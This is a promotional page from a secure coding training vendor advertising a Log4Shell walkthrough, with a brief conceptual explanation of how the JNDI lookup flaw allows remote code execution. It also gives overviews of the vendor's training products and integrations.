Uplift your secure code skills systematically with 100% hands-on training in how to spot and fix vulnerabilities, in your choice of programming language and frameworks.
In this showcase, we will take you from learning the basic idea of Log4j Log4Shell security vulnerability to experiencing its impact in a real-world scenario. Secure Code Warrior skills platform’s unique preventative approach will help make security an intrinsic part of your thought process and workflow to produce quality software - fast!
Sorry to hear that. We are expanding our language coverage for walkthrough mission content as we speak. Meanwhile, why not try Pseudocode to get a taste of what we offer?
Contact us to request a free secure coding course for your team today.
Kick start your mastery of Log4Shell with free learning resources
What is this vulnerability?
Log4Shell is a high severity vulnerability (CVE-2021-44228, CVSSv3 10.0) impacting multiple versions of the Apache Log4j 2 utility. The vulnerability allows for unauthenticated remote code execution. Log4j-core is one of the most common Java logging libraries being used, and therefore it puts millions of applications at risk.
Where does this vulnerability usually arise?
Logged user input is being evaluated at runtime. If the log entry contains the prefix JNDI (Java Naming and Directory Interface), then this service will perform a lookup via a protocol (LDAP, RMI, DNS, etc.), and make a request to the specified server, controlled by the attacker. The response contains a classpath referring to a malicious payload, which is then executed on the vulnerable service.
Forget boring training - systematically build your secure coding skills by trying out this real-world Log4Shell scenario!
We are expanding our language coverage for walkthrough content as we speak. Meanwhile, why not try the walkthrough in Pseudocode to get a taste of what we offer?
Level-up your secure coding knowledge with 100% hands-on coding framework specific challenges covering web, mobile, front-end, APIs, IaC, and more.
Guided learning pathways help you reach your learning goals faster by focusing on OWASP Top 10, Injection Flaws or specific vulnerabilities in your companies code base.Build your secure coding knowledge with interactive framework-specific coding exercises that challenge you to:
Secure Code Warrior training provides hyper-relevant content across over 155+ different vulnerability types, including the all important OWASP Top 10 and CWE/SANS Top 25.Framework-specific training ensures you learn about the exact APIs and code structure that you use daily. Secure Code Warrior content is available in more than 55 languages and frameworks. From COBOL to Rust and everything in between - we've got you covered!
Test your secure coding skills in tournaments and challenge your peers to win the ultimate bragging rights.
In a Secure Code Warrior tournament, players are presented with a series of coding challenges and missions, ranked from easy through to fiendishly hard!Get fired up for a friendly competition that is not only fun but also educational! Whether you are just beginning your security journey or are a grizzled veteran, there is something for everyone in a secure coding tournament.
A direct object reference is when a specific record (the 'object'), is referenced within an application. It usually takes the form of a unique identifier and may appear in a URL.
Sensei empowers you with a secure coding solution directly in your IDE, so that you can share your software knowledge, increase your team’s efficiency and improve secure coding practices by suggesting guidance that breaks the cycle of recurring poor coding practices.
Secure Code Warrior for GitHub adds contextual application security training material to the pull requests and issues you are working on, giving you access to knowledge when you need it most in order to help you and your team ship quality code faster.
Secure Code Warrior for Jira adds contextual application security training material to the issues you are working on, giving you access to knowledge when you need it most in order to help you and your team ship quality code faster.